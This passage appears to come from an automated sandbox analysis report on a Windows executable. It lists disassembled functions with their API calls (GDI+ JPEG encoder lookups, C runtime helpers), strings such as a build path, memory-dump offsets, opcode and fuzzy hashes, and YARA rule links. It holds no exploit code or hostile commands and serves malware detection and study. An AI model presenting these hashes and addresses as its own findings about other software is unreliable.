                                                                                                    • Instruction ID: 5b8a111ec777184d3b9285b5462081de3ad4d40af5247b6b8f630398567f009f
                                                                                                    • Opcode Fuzzy Hash: 554a9e8c29aeda20e02ce97903ee5a4130f6d8e91c2360f5ad8c9ebe88ee43c1
                                                                                                    • Instruction Fuzzy Hash: 4521A1B2940744AEC320EFB5D441B9ABBF8EF09300F00C92FE4E697651EB78A504CB56
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042C0C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0042C0E2
                                                                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 0042C107
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EncodersGdipImage$Size
                                                                                                    • String ID: image/jpeg
                                                                                                    • API String ID: 864223233-3785015651
                                                                                                    • Opcode ID: 1e918e1725a8a157f9196d56c2c9260e5b01738356bce498a86fa547f4107225
                                                                                                    • Instruction ID: 808b449813365729b0edeeee678a10cb9db49e559912ab6d87952b6290e95faf
                                                                                                    • Opcode Fuzzy Hash: 1e918e1725a8a157f9196d56c2c9260e5b01738356bce498a86fa547f4107225
                                                                                                    • Instruction Fuzzy Hash: 5111E732E00118EB8B109F999CC14AEBBB5FE45360B60016BF81073291C7755E559E98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041C9EC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0041C9F1
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prolog
                                                                                                    • String ID: 6rkw$[json.exception.
                                                                                                    • API String ID: 3708980276-421156741
                                                                                                    • Opcode ID: ae89db7eb9d074b4fbd33854220203b5213a49dbe4b20eeb4445b8a340d7e3a5
                                                                                                    • Instruction ID: c627d136464e43b18722d203518cf07b090df2e94217dcff2b1788000faf46b6
                                                                                                    • Opcode Fuzzy Hash: ae89db7eb9d074b4fbd33854220203b5213a49dbe4b20eeb4445b8a340d7e3a5
                                                                                                    • Instruction Fuzzy Hash: D0118671D10158DFCB05EBE5C891AEDBBB4EF55318F10806FE006A3282DBB89A85CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042653C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • object != nullptr, xrefs: 0042658D
                                                                                                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426588
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
                                                                                                    • API String ID: 3519838083-2355325030
                                                                                                    • Opcode ID: eda85bbb29f7a67d2c6e0959c6dfc428d70cef0677166bed7515c0ccf7fb8bfe
                                                                                                    • Instruction ID: 576cac20529d08dd017f4d20a09ad8b78334590e865ddf8fdf419cb452501d68
                                                                                                    • Opcode Fuzzy Hash: eda85bbb29f7a67d2c6e0959c6dfc428d70cef0677166bed7515c0ccf7fb8bfe
                                                                                                    • Instruction Fuzzy Hash: 92F0AF71E403149FD351DF689802749BBF4EF04B04F10806FE849EB341E6788A04CB89
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004265A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • object != nullptr, xrefs: 004265E9
                                                                                                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004265E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
                                                                                                    • API String ID: 3519838083-2355325030
                                                                                                    • Opcode ID: c038c83aaa2956a33b72ef538111fefed61ddc2958b314b3ed2c79a7468b20b7
                                                                                                    • Instruction ID: 6c344f967f61df9999932ce3ab7ba41ba1deb411c9b6cb5ba1a866f0604a8197
                                                                                                    • Opcode Fuzzy Hash: c038c83aaa2956a33b72ef538111fefed61ddc2958b314b3ed2c79a7468b20b7
                                                                                                    • Instruction Fuzzy Hash: 06F0A071E40224A7CB11ABA495027DEBBB4DB44B58F10816FE805A2282DAB80A4487DA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%